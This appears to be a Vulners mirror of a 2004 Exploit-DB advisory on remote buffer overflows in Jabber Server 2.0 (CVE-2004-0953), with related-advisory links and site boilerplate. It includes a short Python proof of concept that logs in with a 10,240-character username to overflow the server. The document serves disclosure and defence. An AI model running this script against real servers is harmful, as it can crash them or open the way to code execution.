Lucene search
+L

Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities

🗓️ 24 Nov 2004 00:00:00Reported by icbmType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Multiple remote buffer overflow vulnerabilities in Jabber Server may allow arbitrary code execution.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2004-0953
1 Dec 200405:00
cve
Cvelist
CVE-2004-0953
1 Dec 200405:00
cvelist
EUVD
EUVD-2004-0951
7 Oct 202500:30
euvd
NVD
CVE-2004-0953
10 Jan 200505:00
nvd
OpenVAS
FreeBSD Ports: jabberd
4 Sep 200800:00
openvas
OpenVAS
FreeBSD Ports: jabberd
4 Sep 200800:00
openvas
securityvulns
[Full-Disclosure] Jabberd2.x remote BuffJabberd2.x remote Buffer Overflowser Overflows
24 Nov 200400:00
securityvulns
source: https://www.securityfocus.com/bid/11741/info

Multiple remote buffer overflow vulnerabilities affect the Jabber Server. These issues are due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may leverage these issues to execute arbitrary code on a computer with the privileges of the server process. This may facilitate unauthorized access or privilege escalation.

#!/usr/bin/python
import xmpp
name = 'a'*10240
# Born a client
cl=xmpp.Client('localhost')
if not cl.connect(server=('192.168.10.138',5222)):
raise IOError('Can not connect to server.')
if not cl.auth(name,'jabberuserpassword','optional resource name'):
raise IOError('Can not auth with server.')
cl.disconnect()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Mar 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.10155
30